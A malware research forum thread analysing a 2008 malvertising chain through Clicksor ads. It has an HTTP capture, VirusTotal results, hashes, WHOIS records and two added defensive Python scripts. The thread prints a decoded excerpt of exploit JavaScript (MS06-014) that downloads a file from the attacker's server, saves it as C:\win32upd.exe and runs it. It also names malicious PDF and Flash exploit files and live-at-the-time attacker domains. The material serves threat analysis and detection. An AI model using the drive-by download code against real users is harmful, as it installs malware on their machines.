Full Version: win32upd.exe - banner.swf - flashba.pdf
B.I.S.S. Forums > Malware Research Forum > Malware Playground
Kimberly
New incident involving Clicksor advertising ... are they really unable to check out from whom they accept advertisements, or are they involved?

At first sight, one *might* think that us.adstore5.com/col7/728x90_animated.swf was the culprit for the executable downloaded on my PC ... well it ain't.
The page at serv.clicksor.com/serving/flashStage.php?zone=&chad=1&cs=&adtype=1&sid=[removed] contains a small script in addition to the advertising link pointing at our 728x90_animated.swf as seen below.
Once the "parts" are concatenated, we notice a reference to us.adstore5.com/col7/frame.settings. From there we are redirected to fx-tracker.com/pdfdoc/index.php?id=728
That page leads to an interesting js script containing a couple of exploits.
CODE
GET /pdfdoc/index.php?id=728 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://serv.clicksor.com/serving/flashStage.php?zone=&chad=1&cs=&adtype=1&[removed]
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
Host: fx-tracker.com

HTTP/1.1 200 OK
Date: Thu, 18 Sep 2008 20:41:25 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.2.6
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 64
Connection: close
Content-Type: text/html; charset=windows-1251

<script src="js.php?sessid=e3b4eqW7UA2e227tCO3M4a70b1"></script>
The first part of the obfuscated code attempts to save & run win32upd.exe using the usual BD96C556-65A3-11D0-983A-00C04FC29E36 - Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014)
Below is an excerpt of the decoded block.
CODE
var exfile = "pdff.php";
za_lu.open  ( "GET", exfile, false);
za_lu.send();
var ff_pp ="g";
ob_ola.type = 1;
ob_ola.open();
var ff_pp ="g";
var h_y_f = za_lu.responseBody;
ob_ola.Write( h_y_f);
var tss = "C:\\win32upd.exe";
ob_ola.SaveToFile(tss,2);
var ff_pp ="g";
ob_ola.close();
var ff_pp ="g";
ob_sa.ShellExecute(tss);
The second part consists of a malicious PDF file which exploits a known vulnerability in the Collab.collectEmailInfo function of Acrobat Reader's JavaScript engine (CVE-2007-5659) and a malicious flash file containing a redirect to ex2tracking.com/pdfdoc/pdff.php

VirusTotal results
File win32upd.exe received on 09.18.2008 23:30:46 (CET)
AhnLab-V3 2008.9.19.0 2008.09.18 -
AntiVir 7.8.1.34 2008.09.18 TR/Crypt.XPACK.Gen
Authentium 5.1.0.4 2008.09.18 -
Avast 4.8.1195.0 2008.09.18 -
AVG 8.0.0.161 2008.09.18 -
BitDefender 7.2 2008.09.18 -
CAT-QuickHeal 9.50 2008.09.17 -
ClamAV 0.93.1 2008.09.18 -
DrWeb 4.44.0.09170 2008.09.18 -
eSafe 7.0.17.0 2008.09.18 -
eTrust-Vet 31.6.6094 2008.09.18 -
Ewido 4.0 2008.09.18 -
F-Prot 4.4.4.56 2008.09.18 -
F-Secure 8.0.14332.0 2008.09.18 -
Fortinet 3.113.0.0 2008.09.18 -
GData 19 2008.09.18 -
Ikarus T3.1.1.34.0 2008.09.18 -
K7AntiVirus 7.10.461 2008.09.18 -
Kaspersky 7.0.0.125 2008.09.18 -
McAfee 5387 2008.09.18 -
Microsoft 1.3903 2008.09.18 TrojanDownloader:Win32/Small.IQ
NOD32v2 3453 2008.09.18 a variant of Win32/Kryptik.O
Norman 5.80.02 2008.09.18 -
Panda 9.0.0.4 2008.09.18 -
PCTools 4.4.2.0 2008.09.18 -
Prevx1 V2 2008.09.18 Cloaked Malware
Rising 20.62.32.00 2008.09.18 -
Sophos 4.33.0 2008.09.18 Mal/EncPk-CZ
Sunbelt 3.1.1647.1 2008.09.18 -
Symantec 10 2008.09.18 -
TheHacker 6.3.0.9.087 2008.09.18 -
TrendMicro 8.700.0.1004 2008.09.18 -
VBA32 3.12.8.5 2008.09.18 -
ViRobot 2008.9.18.1381 2008.09.18 -
VirusBuster 4.5.11.0 2008.09.18 -
Webwasher-Gateway 6.6.2 2008.09.18 Trojan.Crypt.XPACK.Gen

Additional information
File size: 31744 bytes
MD5...: 5f9ee250b6b7b25884a0eda9b1b64120
SHA1..: 9fc1ecb18936238ae9b8296b357737158fb9d694
SHA256: d526692d0d5604e691000f2b8b23d3a830a4c6bd3352317e4a52b9e5d038624e


Kaspersky: Trojan-Downloader.Win32.Small.admn
______________________________

File banner.swf received on 09.18.2008 23:26:34 (CET)
AhnLab-V3 2008.9.19.0 2008.09.18 -
AntiVir 7.8.1.34 2008.09.18 -
Authentium 5.1.0.4 2008.09.18 -
Avast 4.8.1195.0 2008.09.18 -
AVG 8.0.0.161 2008.09.18 -
BitDefender 7.2 2008.09.18 -
CAT-QuickHeal 9.50 2008.09.17 -
ClamAV 0.93.1 2008.09.18 -
DrWeb 4.44.0.09170 2008.09.18 -
eSafe 7.0.17.0 2008.09.18 -
eTrust-Vet 31.6.6094 2008.09.18 -
Ewido 4.0 2008.09.18 -
F-Prot 4.4.4.56 2008.09.18 -
F-Secure 8.0.14332.0 2008.09.18 -
Fortinet 3.113.0.0 2008.09.18 -
GData 19 2008.09.18 -
Ikarus T3.1.1.34.0 2008.09.18 -
K7AntiVirus 7.10.461 2008.09.18 -
Kaspersky 7.0.0.125 2008.09.18 -
McAfee 5387 2008.09.18 -
Microsoft 1.3903 2008.09.18 -
NOD32v2 3453 2008.09.18 -
Norman 5.80.02 2008.09.18 -
Panda 9.0.0.4 2008.09.18 -
PCTools 4.4.2.0 2008.09.18 -
Prevx1 V2 2008.09.18 -
Rising 20.62.32.00 2008.09.18 -
Sophos 4.33.0 2008.09.18 -
Sunbelt 3.1.1647.1 2008.09.18 -
Symantec 10 2008.09.18 -
TheHacker 6.3.0.9.087 2008.09.18 -
TrendMicro 8.700.0.1004 2008.09.18 -
VBA32 3.12.8.5 2008.09.18 -
ViRobot 2008.9.18.1381 2008.09.18 -
VirusBuster 4.5.11.0 2008.09.18 -
Webwasher-Gateway 6.6.2 2008.09.18 -

Additional information
File size: 10332 bytes
MD5...: ae8c94823a2a82af749088584ed11edd
SHA1..: 47610b05c4b15d84040a2a986c27bb3557797d34
SHA256: 3a5a0d00606e931d367db788e12e3855627124aa640197d62f6bc6259a431922


Redirect to ex2tracking.com/pdfdoc/pdff.php?0

Kaspersky: Exploit.SWF.Agent.e
______________________________

File flashba.pdf received on 09.19.2008 01:39:30 (CET)
AhnLab-V3 2008.9.19.0 2008.09.18 -
AntiVir 7.8.1.34 2008.09.18 -
Authentium 5.1.0.4 2008.09.19 -
Avast 4.8.1195.0 2008.09.18 -
AVG 8.0.0.161 2008.09.18 -
BitDefender 7.2 2008.09.19 -
CAT-QuickHeal 9.50 2008.09.17 -
ClamAV 0.93.1 2008.09.19 -
DrWeb 4.44.0.09170 2008.09.19 -
eSafe 7.0.17.0 2008.09.18 -
eTrust-Vet 31.6.6091 2008.09.16 -
Ewido 4.0 2008.09.18 -
F-Prot 4.4.4.56 2008.09.18 -
F-Secure 8.0.14332.0 2008.09.19 -
Fortinet 3.113.0.0 2008.09.18 -
GData 19 2008.09.19 -
Ikarus T3.1.1.34.0 2008.09.19 -
K7AntiVirus 7.10.461 2008.09.18 -
Kaspersky 7.0.0.125 2008.09.19 -
McAfee 5387 2008.09.18 -
Microsoft 1.3903 2008.09.19 -
NOD32v2 3453 2008.09.18 -
Norman 5.80.02 2008.09.18 -
Panda 9.0.0.4 2008.09.18 -
PCTools 4.4.2.0 2008.09.18 -
Prevx1 V2 2008.09.19 -
Rising 20.62.32.00 2008.09.18 -
Sophos 4.33.0 2008.09.19 -
Sunbelt 3.1.1647.1 2008.09.18 -
Symantec 10 2008.09.19 -
TheHacker 6.3.0.9.087 2008.09.18 -
TrendMicro 8.700.0.1004 2008.09.18 -
VBA32 3.12.8.5 2008.09.18 -
ViRobot 2008.9.18.1381 2008.09.18 -
VirusBuster 4.5.11.0 2008.09.18 -
Webwasher-Gateway 6.6.2 2008.09.18 -

Additional information
File size: 3455 bytes
MD5...: 52e22ae344f6ca994439cb9c525d5257
SHA1..: ce4644fc506a4edb3b1ed9e4584794bc9463406c
SHA256: e18fd500f6befeb94edb6f2cc0927f736bbbbc1c4a62028574bd68aa19fe0b70


Kaspersky: Exploit.Win32.Pidief.hf

Many thanks to wagdoll for reporting this issue.
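The captured request/response pair above is the piece of this chain a proxy or IDS can actually see: a 200 OK from the tracker whose entire body is one external script include carrying a per-visitor session token, served with a 64-byte Content-Length, reached from an ad-serving referer on another domain. The following Python is an added example (not code from the post or from any of the sites it names) that parses such a capture and scores those traits; `Exchange`, `parse_capture`, `redirector_indicators` and `is_suspicious` are names chosen here, the 256-byte "tiny body" limit is an assumed threshold, and the benign comparison capture is constructed.

```python
"""Heuristic check for a redirector response of the shape captured in the post:
a 200 OK whose whole HTML body is one external <script> include carrying a
session token, with a tiny Content-Length, reached from an ad-serving referer
on another domain.  Added example; all function and class names are assumptions."""
import re
from dataclasses import dataclass
from typing import Dict, List
from urllib.parse import urlsplit

# Constructed sample: the request/response pair shown in the post, minus the
# header line the poster masked out.  Both Cache-Control lines are kept.
REDIRECTOR_CAPTURE = """\
GET /pdfdoc/index.php?id=728 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://serv.clicksor.com/serving/flashStage.php?zone=&chad=1&cs=&adtype=1
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
Host: fx-tracker.com

HTTP/1.1 200 OK
Date: Thu, 18 Sep 2008 20:41:25 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.2.6
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 64
Connection: close
Content-Type: text/html; charset=windows-1251

<script src="js.php?sessid=e3b4eqW7UA2e227tCO3M4a70b1"></script>
"""

# Constructed benign comparison: an ordinary landing page reached from an ad.
BENIGN_CAPTURE = """\
GET /landing/index.html HTTP/1.1
Referer: http://serv.example-adnetwork.test/serving/flashStage.php
Host: shop.example.test

HTTP/1.1 200 OK
Content-Length: 2048
Content-Type: text/html; charset=utf-8

<html><head><title>Shop</title><script src="/static/app.js"></script></head><body>...</body></html>
"""


@dataclass
class Exchange:
    host: str
    path: str
    referer: str
    status: int
    headers: Dict[str, str]  # response headers, names lower-cased
    body: str


def _parse_headers(lines: List[str]) -> Dict[str, str]:
    headers: Dict[str, str] = {}
    for line in lines:
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        # A repeated header is joined so the second Cache-Control is not lost.
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
    return headers


def parse_capture(raw: str) -> Exchange:
    """Split a raw 'request, blank, response headers, blank, body' capture."""
    request, response_head, body = raw.split("\n\n", 2)
    req_lines = request.splitlines()
    _method, path, _version = req_lines[0].split(" ", 2)
    req_headers = _parse_headers(req_lines[1:])
    resp_lines = response_head.splitlines()
    status = int(resp_lines[0].split(" ", 2)[1])
    return Exchange(
        host=req_headers.get("host", ""),
        path=path,
        referer=req_headers.get("referer", ""),
        status=status,
        headers=_parse_headers(resp_lines[1:]),
        body=body.strip(),
    )


# Body that is nothing but a single external script include.
SCRIPT_ONLY_BODY = re.compile(r'^<script\s+src="([^"]+)"\s*>\s*</script>$', re.IGNORECASE)
# Per-visitor token in the script URL (the thread shows sessid= and session=).
SESSION_PARAM = re.compile(r"[?&](sessid|session)=", re.IGNORECASE)
TINY_BODY_LIMIT = 256  # assumed threshold; the captured body is 64 bytes


def redirector_indicators(ex: Exchange) -> List[str]:
    """Return the indicator names that fire for one exchange, in a fixed order."""
    hits: List[str] = []
    if ex.status != 200:
        return hits
    m = SCRIPT_ONLY_BODY.match(ex.body)
    if m:
        hits.append("script_only_body")
        if SESSION_PARAM.search(m.group(1)):
            hits.append("session_token_in_script_src")
    try:
        length = int(ex.headers.get("content-length", "0"))
    except ValueError:
        length = 0
    if 0 < length < TINY_BODY_LIMIT:
        hits.append("tiny_html_body")
    referer_host = urlsplit(ex.referer).hostname or ""
    if referer_host and referer_host != ex.host:
        hits.append("cross_domain_referer")
    return hits


def is_suspicious(ex: Exchange) -> bool:
    """Flag only when the body shape fires; a cross-domain referer alone is normal for ads."""
    hits = redirector_indicators(ex)
    return "script_only_body" in hits and len(hits) >= 3


if __name__ == "__main__":
    for name, raw in (("redirector", REDIRECTOR_CAPTURE), ("benign", BENIGN_CAPTURE)):
        ex = parse_capture(raw)
        print(f"{name}: {ex.host}{ex.path} -> {redirector_indicators(ex)} suspicious={is_suspicious(ex)}")
```

The verdict deliberately requires the script-only body plus two more signals; a cross-domain referer on its own is exactly what legitimate ad serving looks like, so it only adds weight once the body shape has already fired.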
Kimberly
New domains, still coming through Clicksor advertising.

m2.petiads.com/krast5/468x60_krusty_stand.swf (clean)
m2.petiads.com/krast5/frame.settings
ya-tracker.com/pdfdoc/index.php?id=468
ya-tracker.com/pdfdoc/js.php?sessid=[removed]
ya-tracker.com/pdfdoc/pdff.php
ya-tracker.com/pdfdoc/pipo.php?session=[removed]
And ...
ya-tracker.com/pdfdoc/banner.swf containing a link to ya-tracker.com/pdfdoc/pdff.php?[removed]

ya-tracker.com/pdfdoc/flashba.pdf leading to ya-tracker.com/pdfdoc/pdff.php?[removed]
VirusTotal results
File win32upd.exe received on 09.26.2008 19:43:26 (CET)
AntiVir 7.8.1.34 2008.09.26 -
Authentium 5.1.0.4 2008.09.26 -
Avast 4.8.1195.0 2008.09.26 -
AVG 8.0.0.161 2008.09.26 SHeur.CKPG
BitDefender 7.2 2008.09.26 -
CAT-QuickHeal 9.50 2008.09.26 TrojanDownloader.Agent.ahkm
ClamAV 0.93.1 2008.09.26 -
DrWeb 4.44.0.09170 2008.09.26 -
eSafe 7.0.17.0 2008.09.25 Win32.Agent.ahkm
eTrust-Vet 31.6.6110 2008.09.26 -
Ewido 4.0 2008.09.26 -
F-Prot 4.4.4.56 2008.09.25 -
F-Secure 8.0.14332.0 2008.09.26 Trojan-Downloader.Win32.Agent.ahkm
Fortinet 3.113.0.0 2008.09.26 PossibleThreat
GData 19 2008.09.26 -
Ikarus T3.1.1.34.0 2008.09.26 Trojan-Downloader.Win32.Agent.ahkm
K7AntiVirus 7.10.475 2008.09.26 -
Kaspersky 7.0.0.125 2008.09.26 Trojan-Downloader.Win32.Agent.ahkm
McAfee 5392 2008.09.25 -
Microsoft 1.3903 2008.09.26 TrojanDownloader:Win32/Small.IQ
NOD32 3474 2008.09.26 -
Norman 5.80.02 2008.09.26 -
Panda 9.0.0.4 2008.09.25 -
PCTools 4.4.2.0 2008.09.26 -
Prevx1 V2 2008.09.26 Cloaked Malware
Rising 20.63.42.00 2008.09.26 -
SecureWeb-Gateway 6.7.6 2008.09.26 -
Sophos 4.34.0 2008.09.26 -
Sunbelt 3.1.1668.1 2008.09.24 Trojan-Downloader.Win32.Agent.ahkm
Symantec 10 2008.09.26 Downloader
TheHacker 6.3.0.9.094 2008.09.25 -
TrendMicro 8.700.0.1004 2008.09.26 -
VBA32 3.12.8.6 2008.09.26 -
ViRobot 2008.9.26.1394 2008.09.26 Trojan.Win32.Downloader.30208.AF
VirusBuster 4.5.11.0 2008.09.26 -

Additional information
File size: 30208 bytes
MD5...: 0c688f2abd34a127ce1a21632fedadac
SHA1..: bc37dda5574e42cd3421168f5e435045c371f698
SHA256: 5ab774c9c111a3d875b68f47f9569633e32ab42023a63bc04975e59691c95282
PEiD..: -

______________________________

File banner.swf received on 09.26.2008 19:43:43 (CET)
AhnLab-V3 2008.9.25.0 2008.09.26 -
AntiVir 7.8.1.34 2008.09.26 -
Authentium 5.1.0.4 2008.09.26 -
Avast 4.8.1195.0 2008.09.26 -
AVG 8.0.0.161 2008.09.26 -
BitDefender 7.2 2008.09.26 -
CAT-QuickHeal 9.50 2008.09.26 -
ClamAV 0.93.1 2008.09.26 -
DrWeb 4.44.0.09170 2008.09.26 -
eSafe 7.0.17.0 2008.09.25 -
eTrust-Vet 31.6.6110 2008.09.26 -
Ewido 4.0 2008.09.26 -
F-Prot 4.4.4.56 2008.09.25 -
F-Secure 8.0.14332.0 2008.09.26 -
Fortinet 3.113.0.0 2008.09.26 -
GData 19 2008.09.26 -
Ikarus T3.1.1.34.0 2008.09.26 -
K7AntiVirus 7.10.475 2008.09.26 -
Kaspersky 7.0.0.125 2008.09.26 -
McAfee 5392 2008.09.25 -
Microsoft 1.3903 2008.09.26 -
NOD32 3474 2008.09.26 -
Norman 5.80.02 2008.09.26 -
Panda 9.0.0.4 2008.09.25 -
PCTools 4.4.2.0 2008.09.26 -
Prevx1 V2 2008.09.26 -
Rising 20.63.42.00 2008.09.26 -
SecureWeb-Gateway 6.7.6 2008.09.26 -
Sophos 4.34.0 2008.09.26 -
Sunbelt 3.1.1668.1 2008.09.24 -
Symantec 10 2008.09.26 -
TheHacker 6.3.0.9.094 2008.09.25 -
TrendMicro 8.700.0.1004 2008.09.26 -
VBA32 3.12.8.6 2008.09.26 -
ViRobot 2008.9.26.1394 2008.09.26 -
VirusBuster 4.5.11.0 2008.09.26 -

Additional information
File size: 10286 bytes
MD5...: 9e140b1c305157408cb6be144c85827e
SHA1..: 4f9fab0f48022cce1738eaf1e568f2d9c8e971a5
SHA256: add611dc725b27aff0739cc21f058b36eca2aca924728ed91d54f1cbc8a7658d
PEiD..: -
packers (Kaspersky): Swf2Swc

______________________________

File flashba.pdf received on 09.26.2008 19:44:15 (CET)
AhnLab-V3 2008.9.25.0 2008.09.26 -
AntiVir 7.8.1.34 2008.09.26 -
Authentium 5.1.0.4 2008.09.26 -
Avast 4.8.1195.0 2008.09.26 -
AVG 8.0.0.161 2008.09.26 -
BitDefender 7.2 2008.09.26 -
CAT-QuickHeal 9.50 2008.09.26 -
ClamAV 0.93.1 2008.09.26 -
DrWeb 4.44.0.09170 2008.09.26 -
eSafe 7.0.17.0 2008.09.25 -
eTrust-Vet 31.6.6110 2008.09.26 -
Ewido 4.0 2008.09.26 -
F-Prot 4.4.4.56 2008.09.25 -
F-Secure 8.0.14332.0 2008.09.26 -
Fortinet 3.113.0.0 2008.09.26 -
GData 19 2008.09.26 -
Ikarus T3.1.1.34.0 2008.09.26 -
K7AntiVirus 7.10.475 2008.09.26 -
Kaspersky 7.0.0.125 2008.09.26 -
McAfee 5392 2008.09.25 -
Microsoft 1.3903 2008.09.26 -
NOD32 3474 2008.09.26 -
Norman 5.80.02 2008.09.26 -
Panda 9.0.0.4 2008.09.25 -
PCTools 4.4.2.0 2008.09.26 -
Rising 20.63.42.00 2008.09.26 -
SecureWeb-Gateway 6.7.6 2008.09.26 -
Sophos 4.34.0 2008.09.26 -
Sunbelt 3.1.1668.1 2008.09.24 -
Symantec 10 2008.09.26 -
TheHacker 6.3.0.9.094 2008.09.25 -
TrendMicro 8.700.0.1004 2008.09.26 -
ViRobot 2008.9.26.1394 2008.09.26 -
VirusBuster 4.5.11.0 2008.09.26 -

Additional information
File size: 3484 bytes
MD5...: 971fe6e4686581c5e121775c74eb08f4
SHA1..: 041ceabea020bbfc926aaa1514939a5984538718
SHA256: 068066daa3fec52c0a5a35e8921f58d013453deb5a1fd09858ec22f20c543096
PEiD..: -


IP details
m2.petiads.com - 78.109.18.211

Website Title: None given.
ICANN Registrar: INTERCOSMOS MEDIA GROUP, INC. D/B/A DIRECTNIC.COM
Created: 2008-09-24
Expires: 2009-09-24
Updated: 2008-09-25
Name Server: NS0.DIRECTNIC.COM (has 351,330 domains)
Name Server: NS1.DIRECTNIC.COM
Whois Server: whois.directnic.com

IP Location - Kyyiv - Kiev - Dp32a - Putev Alex
Dedicated Hosting: petiads.com is hosted on a dedicated server.

Whois Record
Registrant:
Sijan
3211 Bretu St.
Tartu, NA 52113
EE
238 443211x33
Fax:238 443211

Domain Name: PETIADS.COM

Administrative Contact:
Parum, Sijan
3211 Bretu St.
Tartu, NA 52113
EE
238 443211x33
Fax:238 443211
______________________________

ya-tracker.com - 78.109.20.34

Website Title: eXTReMe Tracking
ICANN Registrar: INTERCOSMOS MEDIA GROUP, INC. D/B/A DIRECTNIC.COM
Created: 2008-09-24
Expires: 2009-09-24
Updated: 2008-09-25
Name Server: NS0.DIRECTNIC.COM (has 351,330 domains)
Name Server: NS1.DIRECTNIC.COM
Whois Server: whois.directnic.com

IP Location - Ukraine - Dp32a2 - Viliam Pozner
Reverse IP: 2 other sites hosted on this server.

Whois Record
Registrant:
ya-tracker inc.
6321 Metreba line, 67,1
Barein, Zarepp 53312
TR
624 623411

Domain Name: YA-TRACKER.COM

Websites.
  1. fx-tracker.com
  2. ya-tracker.com
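The two posts quote VirusTotal results for win32upd.exe a week apart, and reading them side by side by eye is tedious: the second sample is a different file (different size and hashes), some engines pick it up that missed the first, and one engine changes its name between runs (NOD32v2 becomes NOD32). The following Python is an added example, not code from the thread or from VirusTotal, that parses the plain-text result blocks as quoted here and compares two reports; `VtReport`, `parse_report`, `detection_ratio`, `compare` and `sha256_iocs` are names chosen for this example, and the embedded reports are constructed six-engine excerpts of the two win32upd.exe reports with the size and hash lines copied from them.

```python
"""Parse the plain-text VirusTotal result blocks quoted in the thread and
compare two submissions of the same file name.  Added example; the class and
function names are assumptions, not a VirusTotal API."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# Constructed samples: six-engine excerpts of the 09.18 and 09.26 win32upd.exe
# reports in the thread, with their size and hash lines copied as quoted.
REPORT_0918 = """\
File win32upd.exe received on 09.18.2008 23:30:46 (CET)
AntiVir 7.8.1.34 2008.09.18 TR/Crypt.XPACK.Gen
Kaspersky 7.0.0.125 2008.09.18 -
Microsoft 1.3903 2008.09.18 TrojanDownloader:Win32/Small.IQ
NOD32v2 3453 2008.09.18 a variant of Win32/Kryptik.O
Prevx1 V2 2008.09.18 Cloaked Malware
Symantec 10 2008.09.18 -

Additional information
File size: 31744 bytes
MD5...: 5f9ee250b6b7b25884a0eda9b1b64120
SHA1..: 9fc1ecb18936238ae9b8296b357737158fb9d694
SHA256: d526692d0d5604e691000f2b8b23d3a830a4c6bd3352317e4a52b9e5d038624e
"""

REPORT_0926 = """\
File win32upd.exe received on 09.26.2008 19:43:26 (CET)
AntiVir 7.8.1.34 2008.09.26 -
Kaspersky 7.0.0.125 2008.09.26 Trojan-Downloader.Win32.Agent.ahkm
Microsoft 1.3903 2008.09.26 TrojanDownloader:Win32/Small.IQ
NOD32 3474 2008.09.26 -
Prevx1 V2 2008.09.26 Cloaked Malware
Symantec 10 2008.09.26 Downloader

Additional information
File size: 30208 bytes
MD5...: 0c688f2abd34a127ce1a21632fedadac
SHA1..: bc37dda5574e42cd3421168f5e435045c371f698
SHA256: 5ab774c9c111a3d875b68f47f9569633e32ab42023a63bc04975e59691c95282
PEiD..: -
"""

# "Engine Version YYYY.MM.DD verdict" where the verdict may contain spaces or be "-".
ENGINE_LINE = re.compile(r"^(\S+) (\S+) (\d{4}\.\d{2}\.\d{2}) (.+)$")
HEADER_LINE = re.compile(r"^File (\S+) received on (\S+ \S+) \(CET\)$")
HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256)\.*: ([0-9a-fA-F]+)$")
SIZE_LINE = re.compile(r"^File size: (\d+) bytes$")


@dataclass
class VtReport:
    filename: str = ""
    received: str = ""
    size: int = 0
    hashes: Dict[str, str] = field(default_factory=dict)
    # engine -> detection name, or None where the engine reported "-"
    results: Dict[str, Optional[str]] = field(default_factory=dict)


def parse_report(text: str) -> VtReport:
    rep = VtReport()
    for line in text.splitlines():
        line = line.strip()
        if (m := HEADER_LINE.match(line)):
            rep.filename, rep.received = m.group(1), m.group(2)
        elif (m := SIZE_LINE.match(line)):
            rep.size = int(m.group(1))
        elif (m := HASH_LINE.match(line)):
            rep.hashes[m.group(1).lower()] = m.group(2).lower()
        elif (m := ENGINE_LINE.match(line)):
            engine, _version, _date, verdict = m.groups()
            rep.results[engine] = None if verdict == "-" else verdict
    return rep


def detection_ratio(rep: VtReport) -> Tuple[int, int]:
    """(engines that detected, engines that scanned)."""
    return sum(1 for v in rep.results.values() if v), len(rep.results)


def detecting_engines(rep: VtReport) -> Set[str]:
    return {engine for engine, verdict in rep.results.items() if verdict}


def compare(old: VtReport, new: VtReport) -> Dict[str, object]:
    """Whether both reports describe the same binary, and which engines changed.
    An engine renamed between runs (NOD32v2 -> NOD32) shows up as lost + absent."""
    return {
        "same_file": old.hashes.get("sha256") == new.hashes.get("sha256"),
        "gained": sorted(detecting_engines(new) - detecting_engines(old)),
        "lost": sorted(detecting_engines(old) - detecting_engines(new)),
    }


def sha256_iocs(reports: List[VtReport]) -> Set[str]:
    """Distinct SHA256 values to hunt for, one per sample actually seen."""
    return {r.hashes["sha256"] for r in reports if "sha256" in r.hashes}


if __name__ == "__main__":
    a, b = parse_report(REPORT_0918), parse_report(REPORT_0926)
    for rep in (a, b):
        hits, total = detection_ratio(rep)
        print(f"{rep.filename} {rep.received}: {hits}/{total} size={rep.size} sha256={rep.hashes['sha256']}")
    print(compare(a, b))
```

Because the two submissions have different hashes, `compare` reports `same_file` as false, which is the point worth noticing before reading anything into the detection counts: the 09.26 engines are not "catching up" on the 09.18 binary, they are looking at a repacked one.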